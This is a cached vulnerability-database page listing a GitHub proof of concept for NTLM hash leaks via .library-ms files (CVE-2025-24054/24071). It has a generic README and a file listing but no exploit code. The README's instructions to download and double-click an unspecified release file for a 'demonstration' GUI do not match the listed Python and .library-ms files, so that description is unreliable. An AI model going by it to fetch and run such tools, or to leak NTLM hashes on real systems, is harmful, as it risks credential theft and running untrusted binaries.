Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24054 PoC — Microsoft NTLM 安全漏洞

Source
Associated Vulnerability
Title:Microsoft NTLM 安全漏洞 (CVE-2025-24054)
Description:Microsoft NTLM是美国微软(Microsoft)公司的一个在包括运行Windows操作系统的系统以及独立系统在内的网络上使用的身份验证协议。 Microsoft NTLM存在安全漏洞。攻击者利用该漏洞执行欺骗攻击。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server 2019 (
Description
🛠️ Exploit NTLM hash leaks via `.library-ms` files on unpatched Windows systems for research with this proof of concept and setup instructions.
Readme
# 🛡️ CVE-2025-24054_CVE-2025-24071-PoC - Simple Tool for Enhanced Security Awareness

[![Download Now](https://img.shields.io/badge/Download_Now-%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20-blue)](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases)

## 📜 Description

CVE-2025-24054_CVE-2025-24071-PoC is a proof of concept tool designed to demonstrate the NTLM hash leak vulnerability present via the .library-ms files. This software provides a straightforward way to understand and explore the implications of these vulnerabilities, promoting better awareness of security practices in Windows environments.

## 🚀 Getting Started

Follow these simple steps to download and run our software. 

### 🛠️ System Requirements

- **Operating System**: Windows 10 or later
- **Memory**: 2 GB RAM or more recommended
- **Storage**: At least 50 MB free space
- **Network**: Internet connection for downloading the tool

### 📥 Download & Install

To get started, you can download the application from our releases page. 

[Visit this page to download](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases).

1. Click the link above to go to the Releases page.
2. Look for the latest version.
3. Choose the appropriate file for your system and click on it to download.
4. Save the file to a location on your computer where you can easily find it.

### 💻 Running the Application

After downloading, you will need to run the application:

1. Navigate to the location where you saved the downloaded file.
2. Double-click on the file to start the application.
3. Follow any prompts that appear on your screen to proceed.
4. The tool will launch, and you can begin exploring its features.

## 🔍 Features

- **Demonstrates Vulnerabilities**: Understand how NTLM hash leaks can occur.
- **User-Friendly Interface**: Designed for ease of navigation.
- **Informative Output**: Learn about the risks associated with these vulnerabilities.

## ⚙️ Usage Instructions

1. Upon launching the application, you will see a clean interface.
2. Click on the “Start Demonstration” button to begin.
3. Follow the on-screen instructions to simulate the exploitation process.
4. Review the results and insights provided by the application.

## 📝 Important Notes

- Ensure your system is updated for best performance.
- Use this tool for educational purposes only. 
- Avoid running the tool in production environments.

## 📞 Support & Contact

If you encounter any issues or need assistance, feel free to reach out. You can submit an issue on GitHub via the [Issues section](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/issues). 

## 🕵️‍♂️ Related Topics

This tool relates to several important topics in cybersecurity. It covers:

- CVE-2025-24054 and CVE-2025-24071 vulnerabilities
- NTLM protocol and its security implications
- Basic phishing awareness
- Exploits and their potential impact on users

By understanding these areas, users can better protect themselves and their information online.

For more information, visit our [Releases page](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases) again to ensure you are using the most updated version and accessing the latest documentation. 

Stay safe online!
File Snapshot

[4.0K] /data/pocs/5c57619a1ad09a6c65afe6017b320fd4172cf7a9 ├── [ 693] exploit.py ├── [3.2K] README.md └── [ 364] xd.library-ms 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.